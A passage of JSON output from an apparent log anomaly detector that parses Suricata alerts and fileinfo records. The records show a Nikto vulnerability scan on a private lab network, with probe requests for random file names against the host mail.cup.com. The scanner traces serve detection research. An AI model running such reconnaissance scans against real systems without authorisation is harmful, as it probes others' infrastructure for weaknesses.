null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46888, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":287028353316318,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 287028353316318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80", "/parser/model/time": 1583349514.27886, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46890, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.279049, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1745783930633893,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.csp", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46890, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1745783930633893,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1745783930633893, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80", "/parser/model/time": 1583349514.285211, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46892, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.285211 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46892 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.koi8-r", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.285927, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":899997495875252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.koi8-r\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.koi8-r", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46892, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":899997495875252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 899997495875252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.285927+0000\",\"flow_id\":899997495875252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46892,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.koi8-r\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.koi8-r\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46894 -> 192.168.10.154:80", "/parser/model/time": 1583349514.287568, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46894, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.287568 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46894 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.29 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.287764+0000\",\"flow_id\":2181886319943873,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.287764, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2181886319943873,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46894,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", 